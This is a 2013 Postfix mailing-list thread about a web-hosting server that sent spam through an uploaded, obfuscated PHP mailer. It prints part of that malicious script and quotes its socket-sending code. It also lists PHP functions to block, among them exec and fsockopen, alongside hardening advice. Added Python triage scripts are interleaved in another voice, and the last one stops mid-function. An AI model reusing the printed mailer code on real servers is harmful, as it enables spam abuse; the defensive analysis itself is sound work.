
Temporarily block domain.tld from sending?

  • Voytek
    Message 1 of 18, Oct 7, 2013

      It seems one of my users has been hacked, my postfix server is spewing spam from many.names@..., how best to prevent any outbound mails from adomain.tld till I can look at this?


      --
      Sent from Kaiten Mail. Please excuse my brevity.
    • Simon B
      Message 2 of 18, Oct 7, 2013


        On 8 Oct 2013 01:54, "Voytek" <lists@...> wrote:
        >
        > It seems one of my users has been hacked, my postfix server is spewing spam from many.names@..., how best to prevent any outbound mails from adomain.tld till I can look at this?
        >

        Postfix stop

        Then post your postconf -n and a log snippet of an outgoing spam message.

        Simon

      • lists@...
        Message 3 of 18, Oct 7, 2013
          On Tue, October 8, 2013 11:31 am, Simon B wrote:
          > On 8 Oct 2013 01:54, "Voytek" <lists@...> wrote:

          > spam from many.names@..., how best to prevent any outbound mails
          > from adomain.tld till I can look at this?

          > Postfix stop
          >
          >
          > Then post your postconf -n and a log snippet of an outgoing spam message.

          Simon, thanks

          --------------------
          # postconf -n
          address_verify_sender = $double_bounce_sender
          alias_database = hash:/etc/aliases
          alias_maps = hash:/etc/aliases
          anvil_rate_time_unit = 1800s
          body_checks = pcre:/etc/postfix/body_checks
          body_checks_size_limit = 150000
          broken_sasl_auth_clients = yes
          command_directory = /usr/sbin
          config_directory = /etc/postfix
          content_filter = smtp-amavis:[127.0.0.1]:10024
          daemon_directory = /usr/libexec/postfix
          debug_peer_level = 2
          disable_vrfy_command = yes
          header_checks = pcre:/etc/postfix/header_checks
          home_mailbox = Maildir/
          html_directory = /usr/share/doc/postfix-2.4.5-documentation/html
          local_recipient_maps = unix:passwd.byname $alias_maps
          local_transport = local
          mail_owner = postfix
          mailq_path = /usr/bin/mailq.postfix
          manpage_directory = /usr/share/man
          message_size_limit = 15360000
          mime_header_checks = pcre:$config_directory/mime_headers.pcre
          mydestination = $myhostname, localhost.$mydomain
          myhostname = server.tld
          mynetworks = 111.222.333.444 222.333.444.555 127.0.0.1
          myorigin = $mydomain
          newaliases_path = /usr/bin/newaliases.postfix
          queue_directory = /var/spool/postfix
          readme_directory = /usr/share/doc/postfix-2.4.5-documentation/readme
          recipient_bcc_maps = hash:/etc/postfix/bcc_r_maps
          recipient_delimiter = +
          sample_directory = /etc/postfix/samples
          sender_bcc_maps = hash:/etc/postfix/bcc_s_maps
          sendmail_path = /usr/sbin/sendmail.postfix
          setgid_group = postdrop
          smtp_tls_cert_file = $smtpd_tls_cert_file
          smtp_tls_key_file = $smtpd_tls_key_file
          smtp_tls_loglevel = 1
          smtp_tls_note_starttls_offer = yes
          smtp_tls_security_level = may
          smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
          smtp_tls_session_cache_timeout = 3600s
          smtpd_client_connection_rate_limit = 50
          smtpd_data_restrictions = reject_unauth_pipelining, permit
          smtpd_helo_required = yes
          smtpd_helo_restrictions = permit_mynetworks, permit_sasl_authenticated,
          check_helo_access ${RE}helo.re
          smtpd_recipient_restrictions = permit_sasl_authenticated,
          permit_mynetworks, reject_unauth_destination, check_recipient_access
          hash:/etc/postfix/recipient_no_checks, reject_non_fqdn_sender,
          reject_non_fqdn_recipient, reject_invalid_helo_hostname,
          reject_non_fqdn_helo_hostname, reject_unknown_sender_domain,
          reject_unknown_reverse_client_hostname, reject_unlisted_recipient,
          check_sender_access hash:/etc/postfix/freemail_access,
          check_recipient_access pcre:/etc/postfix/recipient_checks.pcre,
          check_helo_access hash:/etc/postfix/helo_checks, check_sender_access
          hash:/etc/postfix/sender_checks, check_client_access
          hash:/etc/postfix/client_checks, check_client_access
          pcre:/etc/postfix/client_checks.pcre, reject_rbl_client zen.spamhaus.org,
          reject_rhsbl_client dbl.spamhaus.org, reject_rhsbl_sender
          dbl.spamhaus.org, reject_rbl_client psbl.surriel.com, reject_rbl_client
          bl.spamcop.net, reject_rhsbl_sender dsn.rfc-ignorant.org,
          check_policy_service inet:127.0.0.1:10031, permit
          smtpd_restriction_classes = from_freemail_host
          smtpd_sasl_auth_enable = yes
          smtpd_sasl_authenticated_header = yes
          smtpd_sasl_local_domain =
          smtpd_sasl_path = private/auth
          smtpd_sasl_security_options = noanonymous
          smtpd_sasl_type = dovecot
          smtpd_tls_auth_only = yes
          smtpd_tls_cert_file = /etc/pki/tls/certs/server.crt
          smtpd_tls_key_file = /etc/pki/tls/certs/server.key
          smtpd_tls_loglevel = 1
          smtpd_tls_received_header = yes
          smtpd_tls_security_level = may
          smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
          smtpd_tls_session_cache_timeout = 36000s
          strict_rfc821_envelopes = yes
          tls_random_source = dev:/dev/urandom
          transport_maps = hash:/etc/postfix/transport
          unknown_local_recipient_reject_code = 550
          virtual_alias_maps = proxy:mysql:/etc/postfix/mysql_virtual_alias_maps.cf
          virtual_gid_maps = static:5000
          virtual_mailbox_base = /var/mail/vhosts
          virtual_mailbox_domains =
          proxy:mysql:/etc/postfix/mysql_virtual_domains_maps.cf
          virtual_mailbox_limit = $message_size_limit
          virtual_mailbox_maps = proxy:mysql:/etc/postfix/mysql_virtual_mailbox_maps.cf
          virtual_minimum_uid = 5000
          virtual_transport = lmtp:unix:private/dovecot-lmtp
          virtual_uid_maps = static:5000

          --------------------

          there is a php script on their web as so, I'm trying to see how it was
          uploaded at this point:

          ---------------------
          head xmlrpcVZY.php
          <?php
          @error_reporting(0); @ini_set(chr(101).chr(114).'ror_log',NULL);
          @ini_set('log_errors',0); if (count($_POST) < 2) {
          die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $v5031e998 = false;
          foreach (array_keys($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case
          chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 =
          $v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; case
          chr(101); $v5031e998 = true; break; } } if ($vd56b6998 === '' ||
          $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321));
          $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));
          $v01b6e203 = @$_POST[$vd56b6998]; $v8d777f38 = @$_POST[$v8d777f38];
          $v3d26b0b1 = @$_POST[$v3d26b0b1]; if ($v5031e998) { $v01b6e203 =
          n9a2d8ce3($v01b6e203); $v8d777f38 = n9a2d8ce3($v8d777f38); $v3d26b0b1 =
          n9a2d8ce3($v3d26b0b1); } $v01b6e203 = urldecode(stripslashes($v01b6e203));
          $v8d777f38 = urldecode(stripslashes($v8d777f38)); $v3d26b0b1 =
          urldecode(stripslashes($v3d26b0b1)); if (strpos($v01b6e203, '#',1) !=
          false) { $v16a9b63f = preg_split('/#/', $v01b6e203); $ve2942a04 =
          count($v16a9b63f); } else { $v16a9b63f[0] = $v01b6e203; $ve2942a04 = 1; }
          for ($v865c0c0b=0; $v865c0c0b < $ve2942a04;$v865c0c0b++) { $v01b6e203 =
          $v16a9b63f[$v865c0c0b]; if ($v01b6e203 == '' || !strpos($v01b6e203,'@',1))
          continue; if (strpos($v01b6e203, ';', 1) != false) { list($va3da707b,
          $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203));
          $va3da707b = ucfirst($va3da707b); $vbfbb12dc = ucfirst($vbfbb12dc);
          $v3a5939e4 = next(explode('@', $v081bde0c)); if ($vbfbb12dc == '' ||
          $va3da707b == '') { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c;
          } else { $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>"; } } else {
          $vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203);
          $v3a5939e4 = next(explode('@', $v01b6e203)); }
          preg_match('|<USER>(.*)</USER>|
          snip
          ---------------------

          (I wasn't able to include the above as I was on a 4" mobile screen, sorry)
        • Stan Hoeppner
          Message 4 of 18, Oct 7, 2013
            On 10/7/2013 9:10 PM, lists@... wrote:
            > On Tue, October 8, 2013 11:31 am, Simon B wrote:
            >> On 8 Oct 2013 01:54, "Voytek" <lists@...> wrote:
            >
            >> spam from many.names@..., how best to prevent any outbound mails
            >> from adomain.tld till I can look at this?
            >
            >> Postfix stop
            >>
            >>
            >> Then post your postconf -n and a log snippet of an outgoing spam message.
            >
            > Simon, thanks


            Without the log entries Simon asked for we can't do anything more to
            help you, as we don't know how the spam is being injected. Please
            provide logging that demonstrates the problem.

          • lists@...
            Message 5 of 18, Oct 7, 2013
              On Tue, October 8, 2013 3:02 pm, Stan Hoeppner wrote:
              > On 10/7/2013 9:10 PM, lists@... wrote:

              > Without the log entries Simon asked for we can't do anything more to
              > help you, as we don't know how the spam is being injected. Please provide
              > logging that demonstrates the problem.

              Stan, thanks,

              sorry, I thought that part was sufficient in my message:

              > there is a php script on their web as so, I'm trying to see how it was
              > uploaded at this point:
              >
              > ---------------------
              > head xmlrpcVZY.php

              there was a php script uploaded and called

              Oct 7 23:53:07 postfix/pickup[27638]: DA64B3829CE: uid=48
              from=<lola_clark@...>
              Oct 7 23:53:07 postfix/qmgr[10092]: DA64B3829CE:
              from=<lola_clark@...>, size=891, nrcpt=1 (queue active)

              ...
              Oct 7 23:53:07 geko postfix/pickup[27638]: DA64B3829CE: uid=48
              from=<lola_clark@...>

              216.187.94.181 - - [08/Oct/2013:15:07:17 +1100] "POST /xmlrpcVZY.php
              HTTP/1.1" 404 211 "-" "-"

              ---------------------------------

              I've removed the script, I stopped ftp (it seems it was ftp'd)

              at the time I posted, I was on a 4" mobile, and I was looking for a
              stop-gap measure to 'stop further damage' from that point
            • Stan Hoeppner
              Message 6 of 18, Oct 7, 2013
                On 10/7/2013 11:19 PM, lists@... wrote:
                > On Tue, October 8, 2013 3:02 pm, Stan Hoeppner wrote:
                >> On 10/7/2013 9:10 PM, lists@... wrote:
                >
                >> Without the log entries Simon asked for we can't do anything more to
                >> help you, as we don't know how the spam is being injected. Please provide
                >> logging that demonstrates the problem.
                >
                > Stan, thanks,
                >
                > sorry, I thought that part was sufficient in my message:
                >
                >> there is a php script on their web as so, I'm trying to see how it was
                >> uploaded at this point:
                >>
                >> ---------------------
                >> head xmlrpcVZY.php
                >
                > there was a php script uploaded and called
                >
                > Oct 7 23:53:07 postfix/pickup[27638]: DA64B3829CE: uid=48
                > from=<lola_clark@...>
                > Oct 7 23:53:07 postfix/qmgr[10092]: DA64B3829CE:
                > from=<lola_clark@...>, size=891, nrcpt=1 (queue active)
                >
                > ...
                > Oct 7 23:53:07 geko postfix/pickup[27638]: DA64B3829CE: uid=48
                > from=<lola_clark@...>
                >
                > 216.187.94.181 - - [08/Oct/2013:15:07:17 +1100] "POST /xmlrpcVZY.php
                > HTTP/1.1" 404 211 "-" "-"
                >
                > ---------------------------------
                >
                > I've removed the script, I stopped ftp (it seems it was ftp'd)
                >
                > at the time I've posted, I was on a 4" mobile, and, I was looking for a
                > stop gap measure to 'stop further damage' from that point

                Understood. For a more permanent solution to this script problem, you
                may want to consider locking down or disabling the pickup service, and
                configuring all web applications and MUAs to use the submission service
                with auth. This will prevent such scripts from being able to send mail
                in the event some crafty soul is able to get one uploaded via something
                other than FTP.

                --
                Stan
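The pickup log lines earlier in the thread (uid=48 being the web server's uid on that host) are exactly the signal Stan's advice targets: mail injected through the sendmail binary by a local process instead of through authenticated submission. The detector below is an added example, not code from the thread; it parses pickup and qmgr entries from a constructed maillog sample, aggregates submissions per local uid, and flags the web server uid (assumed to be 48) as well as any uid that rotates through several envelope senders, the pattern seen in the spam run.

```python
import re
from collections import defaultdict

# Constructed sample maillog, modeled on the pickup/qmgr entries quoted in the thread.
# uid=48 is assumed to be the apache user; the uid=0 lines stand in for normal local mail.
SAMPLE_MAILLOG = """\
Oct  7 23:53:07 geko postfix/pickup[27638]: DA64B3829CE: uid=48 from=<lola_clark@example.com>
Oct  7 23:53:07 geko postfix/qmgr[10092]: DA64B3829CE: from=<lola_clark@example.com>, size=891, nrcpt=1 (queue active)
Oct  7 23:53:09 geko postfix/pickup[27638]: 1B2C3D4E5F6: uid=48 from=<mike_doe@example.com>
Oct  7 23:53:09 geko postfix/qmgr[10092]: 1B2C3D4E5F6: from=<mike_doe@example.com>, size=903, nrcpt=4 (queue active)
Oct  7 23:53:11 geko postfix/pickup[27638]: 7A8B9C0D1E2: uid=48 from=<sue_ray@example.com>
Oct  7 23:53:11 geko postfix/qmgr[10092]: 7A8B9C0D1E2: from=<sue_ray@example.com>, size=877, nrcpt=2 (queue active)
Oct  7 23:55:01 geko postfix/pickup[27638]: 3F4E5D6C7B8: uid=0 from=<root@example.com>
Oct  7 23:55:01 geko postfix/qmgr[10092]: 3F4E5D6C7B8: from=<root@example.com>, size=512, nrcpt=1 (queue active)
"""

# pickup(8) logs the local uid of the process that ran sendmail(1); smtpd submissions never appear here.
PICKUP_RE = re.compile(
    r"postfix/pickup\[\d+\]: (?P<qid>[0-9A-F]+): uid=(?P<uid>\d+) from=<(?P<sender>[^>]*)>"
)
# qmgr(8) logs size and recipient count once the message is queued.
QMGR_RE = re.compile(
    r"postfix/qmgr\[\d+\]: (?P<qid>[0-9A-F]+): from=<[^>]*>, size=(?P<size>\d+), nrcpt=(?P<nrcpt>\d+)"
)


def parse_maillog(text):
    """Return {queue_id: {uid, sender, size, nrcpt}} for messages that entered via pickup,
    i.e. through the sendmail binary rather than over SMTP. qmgr lines for queue IDs that
    never passed through pickup are ignored on purpose."""
    messages = {}
    for line in text.splitlines():
        m = PICKUP_RE.search(line)
        if m:
            messages[m["qid"]] = {"uid": int(m["uid"]), "sender": m["sender"], "size": 0, "nrcpt": 0}
            continue
        m = QMGR_RE.search(line)
        if m and m["qid"] in messages:
            messages[m["qid"]]["size"] = int(m["size"])
            messages[m["qid"]]["nrcpt"] = int(m["nrcpt"])
    return messages


def summarize_by_uid(messages):
    """Aggregate pickup submissions per local uid: message count, distinct envelope senders,
    total recipients."""
    summary = defaultdict(lambda: {"messages": 0, "senders": set(), "recipients": 0})
    for msg in messages.values():
        entry = summary[msg["uid"]]
        entry["messages"] += 1
        entry["senders"].add(msg["sender"])
        entry["recipients"] += msg["nrcpt"]
    return dict(summary)


def flag_web_uid(summary, web_uid=48, max_distinct_senders=1):
    """Return (uid, messages, distinct_senders, recipients) for uids worth investigating:
    the web server uid submitting mail at all (on a host whose web apps should use
    authenticated submission), or any uid rotating through several envelope senders."""
    flagged = []
    for uid, entry in sorted(summary.items()):
        if uid == web_uid or len(entry["senders"]) > max_distinct_senders:
            flagged.append((uid, entry["messages"], len(entry["senders"]), entry["recipients"]))
    return flagged


if __name__ == "__main__":
    report = flag_web_uid(summarize_by_uid(parse_maillog(SAMPLE_MAILLOG)))
    for uid, count, senders, rcpts in report:
        print(f"uid={uid}: {count} pickup submissions, {senders} distinct senders, {rcpts} recipients")
```

On a live host, feed it `/var/log/maillog` and compare the flagged uid against the web server's uid from `id -u apache` (or the equivalent for your distribution).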
              • lists@rhsoft.net
                Message 7 of 18, Oct 8, 2013
                  On 08.10.2013 07:44, Stan Hoeppner wrote:
                  >> I've removed the script, I stopped ftp (it seems it was ftp'd)
                  >>
                  >> at the time I've posted, I was on a 4" mobile, and, I was looking for a
                  >> stop gap measure to 'stop further damage' from that point
                  >
                  > Understood. For a more permanent solution to this script problem, you
                  > may want to consider locking down or disabling the pickup service, and
                  > configuring all web applications and MUAs to use the submission service
                  > with auth. This will prevent such scripts from being able to send mail
                  > in the event some crafty soul is able to get one uploaded via something
                  > other than FTP.

                  disable_functions = mail
                  http://code.google.com/a/apache-extras.org/p/phpmailer/downloads/list

                  I never allowed any webserver in the past 10 years to
                  use the sendmail binary for a lot of reasons like header
                  injections and so on
                • Manuel Bieling
                  Message 8 of 18, Oct 8, 2013
                    On 2013.10.08 09:16:11 +0200, lists@... wrote:
                    > i never allowed any webserver in the past 10 years to
                    > use the sendmail binary for a lot of reasons like header
                    > injections and so on

                    Good, but possibly would not have helped. For me it looks obvious like
                    'Stealrat' which opens a socket too. I never used PHP in the past 10
                    years would be more convincing. However, I agree using a mail relay and
                    mail storage on one machine with a webserver is too much.

                    if(@mail($recipient, $subject, $message, $reply . $type, "-f$sender"))
                    die(chr(79) . chr(75) . md5(1234567890) . "+0");

                    [...]

                    if(!in_array('fsockopen', $config))
                    $socket = @fsockopen($address, 25, $errno, $errstr, 20);
                    elseif(!in_array('pfsockopen', $config))
                    $socket = @pfsockopen($address, 25, $errno, $errstr, 20);

                    [...]

                    --
                    Best regards,
                    Manuel
                  • lists@rhsoft.net
                    Message 9 of 18, Oct 8, 2013
                      On 08.10.2013 11:32, Manuel Bieling wrote:
                      > On 2013.10.08 09:16:11 +0200, lists@... wrote:
                      >> i never allowed any webserver in the past 10 years to
                      >> use the sendmail binary for a lot of reasons like header
                      >> injections and so on
                      >
                      > Good, but possibly would not have helped. For me it looks obvious like
                      > 'Stealrat' which opens a socket too.

                      postfix does not need to relay without authentication even on 127.0.0.1

                      > I never used PHP in the past 10
                      > years would be more convincing. However, I agree using a mail relay and
                      > mail storage on one maschine with a webserver is too much.
                      >
                      > if(@mail($recipient, $subject, $message, $reply . $type, "-f$sender"))
                      > die(chr(79) . chr(75) . md5(1234567890) . "+0");
                      >
                      > [...]
                      >
                      > if(!in_array('fsockopen', $config))
                      > $socket = @fsockopen($address, 25, $errno, $errstr, 20);
                      > elseif(!in_array('pfsockopen', $config))
                      > $socket = @pfsockopen($address, 25, $errno, $errstr, 20);
                      >
                      > [...]

                      disable_functions = "exec, passthru, shell_exec, system, proc_open, proc_close, proc_nice, proc_terminate,
                      proc_get_status, pcntl_exec, apache_child_terminate, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid,
                      posix_setuid, mail, symlink, link, dl, get_current_user, getmypid, getmyuid, getrusage, fsockopen, pfsockopen,
                      socket_accept, socket_bind, openlog, syslog"
                    • Michael Orlitzky
                      Message 10 of 18, Oct 8, 2013
                        On 10/08/2013 01:44 AM, Stan Hoeppner wrote:
                        >
                        > Understood. For a more permanent solution to this script problem, you
                        > may want to consider locking down or disabling the pickup service, and
                        > configuring all web applications and MUAs to use the submission service
                        > with auth. This will prevent such scripts from being able to send mail
                        > in the event some crafty soul is able to get one uploaded via something
                        > other than FTP.
                        >

                        Having mail() as the universal interface is nice while you're developing
                        in PHP, since there's no need to fiddle with the settings when moving
                        between development and production.

                        In case of smart hacker / stupid customer, we set,

                        sendmail_path = /usr/sbin/sendmail -t -i -f postmaster@...

                        in php.ini so that any attempts at abuse generate bounces to an
                        administrator (postmaster@) rather than e.g. the From header of the message.

                        You'll need to override it in certain cases, but it's a safe default. An
                        additional layer of defense is to set,

                        mail.log = syslog

                        in php.ini and then use the existing syslog notification mechanisms to
                        alert an admin of anything unusual. Unfortunately this fails in roughly
                        the same cases that the envelope sender override does: if someone is
                        running a massive phplist mailing list, they need their bounces (to
                        remove bad addresses), and I don't want to hear about every message they
                        send.
                      • lists@rhsoft.net
                        Message 11 of 18, Oct 8, 2013
                          On 08.10.2013 15:16, Michael Orlitzky wrote:
                          > On 10/08/2013 01:44 AM, Stan Hoeppner wrote:
                          >>
                          >> Understood. For a more permanent solution to this script problem, you
                          >> may want to consider locking down or disabling the pickup service, and
                          >> configuring all web applications and MUAs to use the submission service
                          >> with auth. This will prevent such scripts from being able to send mail
                          >> in the event some crafty soul is able to get one uploaded via something
                          >> other than FTP.
                          >>
                          >
                          > Having mail() as the universal interface is nice while you're developing
                          > in PHP, since there's no need to fiddle with the settings when moving
                          > between development and production

                          well, any software I ever developed from 2003 on is using 127.0.0.1:25 if
                          available without authentication and the configured authentication and SMTP
                          host otherwise

                          on no webserver is postfix listening on 127.0.0.1
                          it listens explicitly on a virtual interface and only there

                          the other option is use http://php.net/manual/de/function.php-uname.php
                          and consider a hostname-scheme for development machines

                          these are all things which are solvable
                        • lists@...
                          Message 12 of 18 , Oct 8, 2013
                            On Tue, October 8, 2013 4:44 pm, Stan Hoeppner wrote:
                            > On 10/7/2013 11:19 PM, lists@... wrote:

                            >> there was a php script uploaded and called

                            >> I've removed the script, I stopped ftp (it seems it was ftp'd)

                            >> at the time I've posted, I was on a 4" mobile, and, I was looking for a
                            >> stop gap measure to 'stop further damage' from that point
                            >

                            Stan, thanks

                            from proftpd logs:

                            ----------
                            cat xfer*

                            Mon Oct 07 11:14:30 2013 0 ::ffff:37.139.47.33 372
                            /home/adom.com.au/public_html/rleeDW.html a _ i r adom.com.au ftp 0 * c
                            Mon Oct 07 11:14:32 2013 0 ::ffff:37.139.47.33 399
                            /home/adom.com.au/public_html/aleeDW.html a _ i r adom.com.au ftp 0 * c
                            Sun Oct 06 05:53:52 2013 0 ::ffff:37.139.47.33 372
                            /home/adom.com.au/public_html/rleeDW.html a _ i r adom.com.au ftp 0 * c
                            Sun Oct 06 05:53:54 2013 0 ::ffff:37.139.47.33 406
                            /home/adom.com.au/public_html/aleeDW.html a _ i r adom.com.au ftp 0 * c
                            Fri Oct 04 04:09:53 2013 0 ::ffff:95.163.104.67 33
                            /home/adom.com.au/public_html/dt.php a _ i r adom.com.au ftp 0 * c
                            Fri Oct 04 04:09:54 2013 0 ::ffff:95.163.104.67 33
                            /home/adom.com.au/public_html/dt.php a _ d r adom.com.au ftp 0 * c
                            Fri Oct 04 04:47:25 2013 0 ::ffff:37.139.47.33 7323
                            /home/adom.com.au/public_html/xmlrpcVZY.php a _ i r adom.com.au ftp 0 * c
                            Fri Sep 20 04:34:21 2013 0 ::ffff:95.163.104.67 33
                            /home/adom.com.au/public_html/dt.php a _ i r adom.com.au ftp 0 * c
                            Fri Sep 20 04:34:23 2013 0 ::ffff:95.163.104.67 33
                            /home/adom.com.au/public_html/dt.php a _ d r adom.com.au ftp 0 * c
                            ----------

                            the ftp users are linked to system users

                            going from above ftp logins:
                            what other logs to search, what to search for?

                            (I'm curious if the user outsourced his web work, AFAIK, the ftp password
                            is a random string assigned from here, will look into this)

                            > Understood. For a more permanent solution to this script problem, you
                            > may want to consider locking down or disabling the pickup service, and
                            > configuring all web applications and MUAs to use the submission service
                            > with auth. This will prevent such scripts from being able to send mail in
                            > the event some crafty soul is able to get one uploaded via something other
                            > than FTP.

                            how do I lock it or disable it?
                            there are several Joomla CMSs, I'll check and see about changing to
                            587/smtp-auth

                            thanks for any other pointers

                            voytek
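The xfer log posted above is the proftpd "xferlog" format: a five-token timestamp followed by positional fields (transfer seconds, remote host, bytes, path, transfer type, special-action flag, direction, access mode, user, service, auth, auth-uid, completion). The pattern worth noticing in it is an upload immediately followed by a delete of the same small `.php` file, which is how someone checks that write access works before dropping a real script. The following is an added example, not code from the thread: a small triage script over constructed log lines in the same layout (documentation addresses 192.0.2.x, 198.51.100.x, 203.0.113.x and the account name example.com are placeholders). It flags script uploads under public_html, upload-then-delete probes, and logins from addresses the customer does not recognise, which answers the "what to search for" question for this log; the same loop runs unchanged over a real `xfer*` file.

```python
"""Triage of a proftpd transfer log (xferlog format) after a suspected FTP
compromise.  Added example for this thread, not part of the original posts.

The log lines below are constructed to mirror the record layout posted in
the thread; 192.0.2.x, 198.51.100.x and 203.0.113.x are documentation
addresses and example.com is a placeholder account name.
"""
import os
from collections import defaultdict
from datetime import datetime

# Constructed sample, same 18-token layout proftpd writes:
#   <5-token timestamp> xfer-seconds remote-host bytes path type special
#   direction access-mode user service auth auth-uid completion
SAMPLE_XFERLOG = """\
Fri Sep 20 04:34:21 2013 0 ::ffff:198.51.100.7 33 /home/example.com/public_html/dt.php a _ i r example.com ftp 0 * c
Fri Sep 20 04:34:23 2013 0 ::ffff:198.51.100.7 33 /home/example.com/public_html/dt.php a _ d r example.com ftp 0 * c
Fri Oct 04 04:47:25 2013 0 ::ffff:192.0.2.10 7323 /home/example.com/public_html/xmlrpcVZY.php a _ i r example.com ftp 0 * c
Mon Oct 07 11:14:30 2013 0 ::ffff:192.0.2.10 372 /home/example.com/public_html/rleeDW.html a _ i r example.com ftp 0 * c
Mon Oct 07 12:00:00 2013 1 ::ffff:203.0.113.5 15000 /home/example.com/public_html/index.html a _ i r example.com ftp 0 * c
Mon Oct 07 12:00:05 2013 1 ::ffff:203.0.113.5 15000 /home/example.com/public_html/index.html a _ o r example.com ftp 0 * c
"""

# File types the web server would execute if they land under public_html.
SCRIPT_EXTENSIONS = {".php", ".php5", ".phtml", ".phar", ".pl", ".cgi", ".py"}


def parse_xferlog_line(line):
    """Split one xferlog record into a dict of the fields triage needs.

    The timestamp is the first five whitespace-separated tokens
    ("Mon Oct 07 11:14:30 2013"); everything after it is positional.
    proftpd replaces spaces in file names with underscores, so splitting
    on whitespace is safe.
    """
    tokens = line.split()
    if len(tokens) < 18:
        raise ValueError("malformed xferlog record: %r" % line)
    host = tokens[6]
    # The thread's log shows IPv4-mapped IPv6 form (::ffff:a.b.c.d); strip
    # the prefix so the address compares equal to an IPv4 allow-list entry.
    if host.startswith("::ffff:"):
        host = host[len("::ffff:"):]
    return {
        "time": datetime.strptime(" ".join(tokens[:5]), "%a %b %d %H:%M:%S %Y"),
        "host": host,
        "size": int(tokens[7]),
        "path": tokens[8],
        "direction": tokens[11],   # i = upload, o = download, d = delete
        "user": tokens[13],
        "completed": tokens[17] == "c",
    }


def triage(xferlog_text, known_hosts=(), probe_window_seconds=60):
    """Return a list of findings, each a dict with a 'kind' key:

    script-upload        an executable file type landed under public_html
    upload-then-delete   a file was uploaded and removed within the window,
                         the pattern of a write-access probe
    unrecognised-source  an account was used from an address not in
                         known_hosts (compare with what the customer reports)
    """
    records = [parse_xferlog_line(l) for l in xferlog_text.splitlines() if l.strip()]
    records.sort(key=lambda r: r["time"])
    findings = []
    last_upload = {}                 # (user, path) -> most recent upload record
    hosts_per_user = defaultdict(set)
    for r in records:
        if not r["completed"]:
            continue
        hosts_per_user[r["user"]].add(r["host"])
        key = (r["user"], r["path"])
        if r["direction"] == "i":
            ext = os.path.splitext(r["path"])[1].lower()
            if ext in SCRIPT_EXTENSIONS and "/public_html/" in r["path"]:
                findings.append({"kind": "script-upload", "user": r["user"],
                                 "host": r["host"], "path": r["path"],
                                 "time": r["time"]})
            last_upload[key] = r
        elif r["direction"] == "d":
            prev = last_upload.pop(key, None)
            if prev and (r["time"] - prev["time"]).total_seconds() <= probe_window_seconds:
                findings.append({"kind": "upload-then-delete", "user": r["user"],
                                 "host": r["host"], "path": r["path"],
                                 "time": r["time"]})
    for user in sorted(hosts_per_user):
        unknown = sorted(hosts_per_user[user] - set(known_hosts))
        if unknown:
            findings.append({"kind": "unrecognised-source", "user": user,
                             "hosts": unknown})
    return findings


if __name__ == "__main__":
    # known_hosts is what the customer says they upload from; everything else
    # is worth a question.
    for finding in triage(SAMPLE_XFERLOG, known_hosts=["203.0.113.5"]):
        print(finding)
```

Run it against the real log with `triage(open("xferlog").read(), known_hosts=[...])`; the source addresses it reports per account are the ones to cross-check against the proftpd auth log and the customer's own recollection.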
                          • Stan Hoeppner
                            Message 13 of 18 , Oct 8, 2013
                              On 10/8/2013 3:08 PM, lists@... wrote:
                              > On Tue, October 8, 2013 4:44 pm, Stan Hoeppner wrote:
                              ...
                              >> Understood. For a more permanent solution to this script problem, you
                              >> may want to consider locking down or disabling the pickup service, and
                              >> configuring all web applications and MUAs to use the submission service
                              >> with auth. This will prevent such scripts from being able to send mail in
                              >> the event some crafty soul is able to get one uploaded via something other
                              >> than FTP.
                              >
                              > how do I lock it or disable ?
                              > there are several Joomla CMSs, I'll check and see about changing to
                              > 587/smtp-auth

                              Others responded with some good ideas here, mostly locking down PHP
                              itself so it can't use the sendmail binary. But it sounds like this is
                              a generic web hosting server for your customers. Which means they may
                              be using all manner of languages other than PHP, such as Perl, Java, etc.

                              In this case, the most thorough way to lock this down, other than
                              disabling the pickup service in master.cf, is to restrict execute
                              permissions on the sendmail binary to root. This prevents all web
                              applications from using the pickup service. Then instruct all of your
                              users to use the submission service on TCP 587 for sending mail.

                              Disabling pickup is the easiest and quickest way to stop this spamming
                              permanently. But it will likely break management functions that need to
                              send mail via pickup, such as logwatch, pflogsumm, etc. Thus
                              restricting which users can execute the sendmail binary is a better
                              solution.

                              --
                              Stan
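The three knobs Stan names here are all checkable from the filesystem: whether the `pickup` entry in master.cf is still active, whether a `submission` entry exists for the 587/auth path users are to be moved to, and whether the group/other execute bits on the sendmail binary still let a web application's uid run it. The following audit is an added example, not Postfix's own tooling; both master.cf excerpts are constructed (the hardened one shows submission enabled with mandatory TLS and SASL, the `-o` overrides being standard Postfix parameters), and the permission demo works on a placeholder file rather than `/usr/sbin/sendmail`.

```python
"""Audit the lock-down points discussed in the thread: is the pickup
service still enabled in master.cf, is the submission service enabled,
and can non-root users execute the sendmail binary?

Added example, not Postfix's own tooling.  The master.cf excerpts are
constructed and the 'sendmail' file in the demo is a placeholder.
"""
import os
import stat
import tempfile

# Constructed excerpt of a stock master.cf: pickup on, submission commented out.
WEAK_MASTER_CF = """\
# service type  private unpriv  chroot  wakeup  maxproc command + args
smtp      inet  n       -       n       -       -       smtpd
#submission inet n       -       n       -       -       smtpd
#  -o syslog_name=postfix/submission
#  -o smtpd_tls_security_level=encrypt
#  -o smtpd_sasl_auth_enable=yes
pickup    unix  n       -       n       60      1       pickup
cleanup   unix  n       -       n       -       0       cleanup
"""

# The same excerpt after enabling submission with mandatory TLS and SASL
# auth.  pickup stays on so logwatch/pflogsumm keep working; the execute
# bits on the sendmail binary are what keep web apps away from it.
HARDENED_MASTER_CF = """\
smtp      inet  n       -       n       -       -       smtpd
submission inet n       -       n       -       -       smtpd
  -o syslog_name=postfix/submission
  -o smtpd_tls_security_level=encrypt
  -o smtpd_sasl_auth_enable=yes
  -o smtpd_client_restrictions=permit_sasl_authenticated,reject
pickup    unix  n       -       n       60      1       pickup
cleanup   unix  n       -       n       -       0       cleanup
"""


def enabled_services(master_cf_text):
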